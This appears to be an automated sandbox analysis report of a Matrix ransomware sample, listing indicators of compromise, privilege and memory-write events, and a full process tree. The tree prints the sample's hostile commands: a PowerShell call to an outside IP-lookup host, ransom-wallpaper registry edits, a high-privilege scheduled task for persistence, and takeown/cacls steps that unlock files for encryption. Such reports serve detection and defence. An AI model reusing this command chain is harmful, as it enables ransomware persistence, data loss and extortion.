description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\icudtl.dat 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jre1.8.0_66\bin\server\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Google\Chrome\Application\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\hr.pak.DATA 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.165.21\MicrosoftEdgeUpdateSetup_X86_1.3.165.21.exe 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Extensions\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_proxy.exe 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\hu.pak 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-explorer.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Staging 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_LinkDrop32x32.gif 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\README.txt 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\java-rmi.exe 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\bg.pak 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightRegular.ttf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jjs.exe 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220812190431.pma 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_zh_CN.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ms.pak.DATA 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\amd64\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.165.21\MicrosoftEdgeUpdateCore.exe 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\autofill_labeling_features_email.txt.DATA 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\!README_KOK08!.rtf 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5044 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4724 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4184 powershell.exe 4184 powershell.exe 2476 powershell.exe 2476 powershell.exe 4564 hbFC3HC764.exe 4564 hbFC3HC764.exe 4564 hbFC3HC764.exe 4564 hbFC3HC764.exe 4564 hbFC3HC764.exe 4564 hbFC3HC764.exe 4564 hbFC3HC764.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4564 hbFC3HC764.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4184 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeTakeOwnershipPrivilege 3752 takeown.exe Token: SeDebugPrivilege 4564 hbFC3HC764.exe Token: SeLoadDriverPrivilege 4564 hbFC3HC764.exe Token: SeTakeOwnershipPrivilege 2424 takeown.exe Token: SeTakeOwnershipPrivilege 4972 takeown.exe Token: SeTakeOwnershipPrivilege 4840 takeown.exe Token: SeBackupPrivilege 4100 vssvc.exe Token: SeRestorePrivilege 4100 vssvc.exe Token: SeAuditPrivilege 4100 vssvc.exe Token: SeTakeOwnershipPrivilege 740 takeown.exe Token: SeTakeOwnershipPrivilege 1740 takeown.exe Token: SeIncreaseQuotaPrivilege 4812 WMIC.exe Token: SeSecurityPrivilege 4812 WMIC.exe Token: SeTakeOwnershipPrivilege 4812 WMIC.exe Token: SeLoadDriverPrivilege 4812 WMIC.exe Token: SeSystemProfilePrivilege 4812 WMIC.exe Token: SeSystemtimePrivilege 4812 WMIC.exe Token: SeProfSingleProcessPrivilege 4812 WMIC.exe Token: SeIncBasePriorityPrivilege 4812 WMIC.exe Token: SeCreatePagefilePrivilege 4812 WMIC.exe Token: SeBackupPrivilege 4812 WMIC.exe Token: SeRestorePrivilege 4812 WMIC.exe Token: SeShutdownPrivilege 4812 WMIC.exe Token: SeDebugPrivilege 4812 WMIC.exe Token: SeSystemEnvironmentPrivilege 4812 WMIC.exe Token: SeRemoteShutdownPrivilege 4812 WMIC.exe Token: SeUndockPrivilege 4812 WMIC.exe Token: SeManageVolumePrivilege 4812 WMIC.exe Token: 33 4812 WMIC.exe Token: 34 4812 WMIC.exe Token: 35 4812 WMIC.exe Token: 36 4812 WMIC.exe Token: SeIncreaseQuotaPrivilege 4812 WMIC.exe Token: SeSecurityPrivilege 4812 WMIC.exe Token: SeTakeOwnershipPrivilege 4812 WMIC.exe Token: SeLoadDriverPrivilege 4812 WMIC.exe Token: SeSystemProfilePrivilege 4812 WMIC.exe Token: SeSystemtimePrivilege 4812 WMIC.exe Token: SeProfSingleProcessPrivilege 4812 WMIC.exe Token: SeIncBasePriorityPrivilege 4812 WMIC.exe Token: SeCreatePagefilePrivilege 4812 WMIC.exe Token: SeBackupPrivilege 4812 WMIC.exe Token: SeRestorePrivilege 4812 WMIC.exe Token: SeShutdownPrivilege 4812 WMIC.exe Token: SeDebugPrivilege 4812 WMIC.exe Token: SeSystemEnvironmentPrivilege 4812 WMIC.exe Token: SeRemoteShutdownPrivilege 4812 WMIC.exe Token: SeUndockPrivilege 4812 WMIC.exe Token: SeManageVolumePrivilege 4812 WMIC.exe Token: 33 4812 WMIC.exe Token: 34 4812 WMIC.exe Token: 35 4812 WMIC.exe Token: 36 4812 WMIC.exe Token: SeTakeOwnershipPrivilege 2396 takeown.exe Token: SeTakeOwnershipPrivilege 3896 takeown.exe Token: SeTakeOwnershipPrivilege 3944 takeown.exe Token: SeTakeOwnershipPrivilege 4212 takeown.exe Token: SeTakeOwnershipPrivilege 4868 takeown.exe Token: SeTakeOwnershipPrivilege 4940 takeown.exe Token: SeTakeOwnershipPrivilege 4576 takeown.exe Token: SeTakeOwnershipPrivilege 4268 takeown.exe Token: SeTakeOwnershipPrivilege 304 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4332 wrote to memory of 756 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 81 PID 4332 wrote to memory of 756 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 81 PID 4332 wrote to memory of 756 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 81 PID 4332 wrote to memory of 4148 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 83 PID 4332 wrote to memory of 4148 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 83 PID 4332 wrote to memory of 4148 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 83 PID 4148 wrote to memory of 3592 4148 NWujmQJJ.exe 85 PID 4148 wrote to memory of 3592 4148 NWujmQJJ.exe 85 PID 4148 wrote to memory of 3592 4148 NWujmQJJ.exe 85 PID 3592 wrote to memory of 4184 3592 cmd.exe 87 PID 3592 wrote to memory of 4184 3592 cmd.exe 87 PID 3592 wrote to memory of 4184 3592 cmd.exe 87 PID 4332 wrote to memory of 4828 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 88 PID 4332 wrote to memory of 4828 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 88 PID 4332 wrote to memory of 4828 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 88 PID 4828 wrote to memory of 2476 4828 cmd.exe 90 PID 4828 wrote to memory of 2476 4828 cmd.exe 90 PID 4828 wrote to memory of 2476 4828 cmd.exe 90 PID 4332 wrote to memory of 1120 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 91 PID 4332 wrote to memory of 1120 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 91 PID 4332 wrote to memory of 1120 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 91 PID 4332 wrote to memory of 1108 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 93 PID 4332 wrote to memory of 1108 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 93 PID 4332 wrote to memory of 1108 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 93 PID 1120 wrote to memory of 2952 1120 cmd.exe 95 PID 1120 wrote to memory of 2952 1120 cmd.exe 95 PID 1120 wrote to memory of 2952 1120 cmd.exe 95 PID 1120 wrote to memory of 4016 1120 cmd.exe 96 PID 1120 wrote to memory of 4016 1120 cmd.exe 96 PID 1120 wrote to memory of 4016 1120 cmd.exe 96 PID 1120 wrote to memory of 4028 1120 cmd.exe 97 PID 1120 wrote to memory of 4028 1120 cmd.exe 97 PID 1120 wrote to memory of 4028 1120 cmd.exe 97 PID 1108 wrote to memory of 1740 1108 cmd.exe 98 PID 1108 wrote to memory of 1740 1108 cmd.exe 98 PID 1108 wrote to memory of 1740 1108 cmd.exe 98 PID 4332 wrote to memory of 32 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 99 PID 4332 wrote to memory of 32 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 99 PID 4332 wrote to memory of 32 4332 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe 99 PID 32 wrote to memory of 420 32 cmd.exe 101 PID 32 wrote to memory of 420 32 cmd.exe 101 PID 32 wrote to memory of 420 32 cmd.exe 101 PID 32 wrote to memory of 3752 32 cmd.exe 102 PID 32 wrote to memory of 3752 32 cmd.exe 102 PID 32 wrote to memory of 3752 32 cmd.exe 102 PID 32 wrote to memory of 3892 32 cmd.exe 103 PID 32 wrote to memory of 3892 32 cmd.exe 103 PID 32 wrote to memory of 3892 32 cmd.exe 103 PID 3892 wrote to memory of 4540 3892 cmd.exe 104 PID 3892 wrote to memory of 4540 3892 cmd.exe 104 PID 3892 wrote to memory of 4540 3892 cmd.exe 104 PID 4540 wrote to memory of 4564 4540 hbFC3HC7.exe 105 PID 4540 wrote to memory of 4564 4540 hbFC3HC7.exe 105 PID 1740 wrote to memory of 2732 1740 wscript.exe 107 PID 1740 wrote to memory of 2732 1740 wscript.exe 107 PID 1740 wrote to memory of 2732 1740 wscript.exe 107 PID 2732 wrote to memory of 5044 2732 cmd.exe 109 PID 2732 wrote to memory of 5044 2732 cmd.exe 109 PID 2732 wrote to memory of 5044 2732 cmd.exe 109 PID 1740 wrote to memory of 1760 1740 wscript.exe 110 PID 1740 wrote to memory of 1760 1740 wscript.exe 110 PID 1740 wrote to memory of 1760 1740 wscript.exe 110 PID 1760 wrote to memory of 5084 1760 cmd.exe 112 PID 1760 wrote to memory of 5084 1760 cmd.exe 112
Processes
-
C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe"C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe" "C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe"2⤵PID:756
-
-
C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe"C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe" -n2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\JjDeQHEq.txt"3⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\zLzXyvi4.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\YnGIlPbI.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\YnGIlPbI.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:2952
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:4016
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4028
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Vx3ThnGc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Vx3ThnGc.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Ct7Xyoqg.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Ct7Xyoqg.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5044
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:5084
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\hbFC3HC764.exehbFC3HC7.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Sets service image path in registry
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵PID:4240
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:3164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "store.db" -nobanner3⤵PID:4216
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
PID:2496
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵PID:4164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:3620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "classes.jsa" -nobanner3⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:3664
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4012
-
-
-
